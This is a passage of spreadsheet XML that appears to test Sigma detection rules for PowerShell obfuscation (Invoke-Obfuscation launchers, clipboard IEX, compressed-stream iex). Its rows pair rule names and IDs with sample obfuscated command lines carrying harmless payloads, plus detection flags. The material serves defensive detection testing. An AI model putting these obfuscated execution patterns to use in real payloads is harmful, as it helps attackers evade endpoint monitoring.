          <t>b222df08-0e07-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1257" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -COMmanD "Set-Clipboard -Value 'Write-Host Executed'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1257" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1257" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1257" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1257" s="43" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1257" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1257" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1258" ht="15.75" customHeight="1" s="42">
      <c r="A1258" s="43" t="n"/>
      <c r="B1258" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C1258" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D1258" s="36" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E1258" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F1258" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1258" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1258" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1258" s="36" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1258" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1258" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1259" ht="15.75" customHeight="1" s="42">
      <c r="A1259" s="43" t="n"/>
      <c r="B1259" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C1259" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D1259" s="36" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E1259" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F1259" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1259" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1259" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1259" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1259" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1259" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1260" ht="15.75" customHeight="1" s="42">
      <c r="A1260" s="43" t="n"/>
      <c r="B1260" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline</t>
        </is>
      </c>
      <c r="C1260" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Obfuscated IEX Invocation</t>
        </is>
      </c>
      <c r="D1260" s="36" t="inlineStr">
        <is>
          <t>4bf943c6-5146-4273-98dd-e958fd1e3abf</t>
        </is>
      </c>
      <c r="E1260" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; ([string]::Join('', ([char]73, [char]69, [char]88))) 'Write-Host Educational_Test'"</t>
        </is>
      </c>
      <c r="F1260" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1260" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1260" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1260" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1260" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1260" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1261" ht="15.75" customHeight="1" s="42">
      <c r="A1261" s="43" t="n"/>
      <c r="B1261" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1261" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1261" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1261" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F1261" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1261" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1261" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1261" s="43" t="n"/>
      <c r="J1261" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1261" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1262" ht="15.75" customHeight="1" s="42">
      <c r="A1262" s="43" t="n"/>
      <c r="B1262" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1262" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1262" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1262" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "echo Write-Host 'Bypass' | powershell.exe -noprofile -command -"</t>
        </is>
      </c>
      <c r="F1262" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1262" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1262" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1262" s="43" t="n"/>
      <c r="J1262" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1262" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1263" ht="15.75" customHeight="1" s="42">
      <c r="A1263" s="43" t="n"/>
      <c r="B1263" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1263" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1263" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1263" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "echo Write-Host 'Bypass' | pwsh.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1263" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1263" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1263" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1263" s="43" t="n"/>
      <c r="J1263" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1263" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1264" ht="15.75" customHeight="1" s="42">
      <c r="A1264" s="43" t="n"/>
      <c r="B1264" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1264" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1264" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1264" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "echo Write-Host 'Bypass' | pwsh.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1264" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1264" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1264" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1264" s="43" t="n"/>
      <c r="J1264" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1264" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1265" ht="15.75" customHeight="1" s="42">
      <c r="A1265" s="43" t="n"/>
      <c r="B1265" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1265" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1265" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1265" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1265" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1265" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1265" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1265" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J1265" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1265" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1266" ht="15.75" customHeight="1" s="42">
      <c r="A1266" s="43" t="n"/>
      <c r="B1266" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1266" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1266" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1266" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -C "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1266" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1266" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1266" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1266" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J1266" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1266" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1267" ht="15.75" customHeight="1" s="42">
      <c r="A1267" s="43" t="n"/>
      <c r="B1267" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_stdin</t>
        </is>
      </c>
      <c r="C1267" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher</t>
        </is>
      </c>
      <c r="D1267" s="36" t="inlineStr">
        <is>
          <t>6c96fc76-0eb1-11eb-adc1-0242ac120002</t>
        </is>
      </c>
      <c r="E1267" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "echo 'Write-Host Bypass' | powershell.exe -noexit -"</t>
        </is>
      </c>
      <c r="F1267" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1267" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1267" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1267" s="43" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002)</t>
        </is>
      </c>
      <c r="J1267" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1267" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1268" ht="15.75" customHeight="1" s="42">
      <c r="A1268" s="43" t="n"/>
      <c r="B1268" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1268" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1268" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1268" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1268" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1268" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1268" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1268" s="43" t="n"/>
      <c r="J1268" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1268" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1269" ht="15.75" customHeight="1" s="42">
      <c r="A1269" s="43" t="n"/>
      <c r="B1269" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1269" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1269" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1269" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1269" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1269" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1269" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1269" s="43" t="n"/>
      <c r="J1269" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1269" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1270" ht="15.75" customHeight="1" s="42">
      <c r="A1270" s="43" t="n"/>
      <c r="B1270" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1270" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1270" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1270" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CommAnD "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1270" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1270" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1270" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1270" s="43" t="n"/>
      <c r="J1270" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1270" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1271" ht="15.75" customHeight="1" s="42">
      <c r="A1271" s="43" t="n"/>
      <c r="B1271" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1271" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1271" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1271" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1271" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1271" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1271" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1271" s="43" t="n"/>
      <c r="J1271" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1271" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1272" ht="15.75" customHeight="1" s="42">
      <c r="A1272" s="43" t="n"/>
      <c r="B1272" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1272" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1272" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1272" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMaNd "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1272" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1272" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1272" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1272" s="43" t="n"/>
      <c r="J1272" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1272" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1273" ht="15.75" customHeight="1" s="42">
      <c r="A1273" s="43" t="n"/>
      <c r="B1273" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1273" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1273" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1273" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COMmanD "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1273" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1273" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1273" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1273" s="43" t="n"/>
      <c r="J1273" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1273" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1274" ht="15.75" customHeight="1" s="42">
      <c r="A1274" s="43" t="n"/>
      <c r="B1274" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_var</t>
        </is>
      </c>
      <c r="C1274" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation VAR+ Launcher</t>
        </is>
      </c>
      <c r="D1274" s="36" t="inlineStr">
        <is>
          <t>27aec9c9-dbb0-4939-8422-1742242471d0</t>
        </is>
      </c>
      <c r="E1274" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmANd "$env:TEST_VAR = 'Write-Output ''Execution Simulated'''; Invoke-Expression $env:TEST_VAR"</t>
        </is>
      </c>
      <c r="F1274" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1274" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1274" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1274" s="43" t="n"/>
      <c r="J1274" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1274" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1275" ht="15.75" customHeight="1" s="42">
      <c r="A1275" s="43" t="n"/>
      <c r="B1275" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1275" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1275" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1275" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1275" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1275" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1275" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1275" s="43" t="n"/>
      <c r="J1275" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1275" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1276" ht="15.75" customHeight="1" s="42">
      <c r="A1276" s="43" t="n"/>
      <c r="B1276" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1276" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1276" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1276" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnD "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1276" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1276" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1276" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1276" s="43" t="n"/>
      <c r="J1276" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1276" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1277" ht="15.75" customHeight="1" s="42">
      <c r="A1277" s="43" t="n"/>
      <c r="B1277" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1277" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1277" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1277" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1277" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1277" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1277" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1277" s="36" t="n"/>
      <c r="J1277" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1277" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1278" ht="15.75" customHeight="1" s="42">
      <c r="A1278" s="43" t="n"/>
      <c r="B1278" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1278" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1278" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1278" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAnd "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1278" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1278" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1278" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1278" s="36" t="n"/>
      <c r="J1278" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1278" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1279" ht="15.75" customHeight="1" s="42">
      <c r="A1279" s="43" t="n"/>
      <c r="B1279" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1279" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1279" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1279" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAND "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1279" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1279" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1279" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1279" s="43" t="n"/>
      <c r="J1279" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1279" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1280" ht="15.75" customHeight="1" s="42">
      <c r="A1280" s="43" t="n"/>
      <c r="B1280" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1280" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1280" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1280" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAND "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1280" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1280" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1280" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1280" s="43" t="n"/>
      <c r="J1280" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1280" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1281" ht="15.75" customHeight="1" s="42">
      <c r="A1281" s="43" t="n"/>
      <c r="B1281" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1281" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1281" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1281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1281" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1281" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1281" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1281" s="36" t="n"/>
      <c r="J1281" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1281" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1282" ht="15.75" customHeight="1" s="42">
      <c r="A1282" s="43" t="n"/>
      <c r="B1282" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1282" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1282" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1282" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -c "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1282" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1282" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1282" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1282" s="43" t="n"/>
      <c r="J1282" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1282" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1283" ht="15.75" customHeight="1" s="42">
      <c r="A1283" s="43" t="n"/>
      <c r="B1283" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1283" s="36" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1283" s="36" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1283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1283" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1283" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1283" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1283" s="43" t="n"/>
      <c r="J1283" s="36" t="n">
        <v>0</v>
      </c>
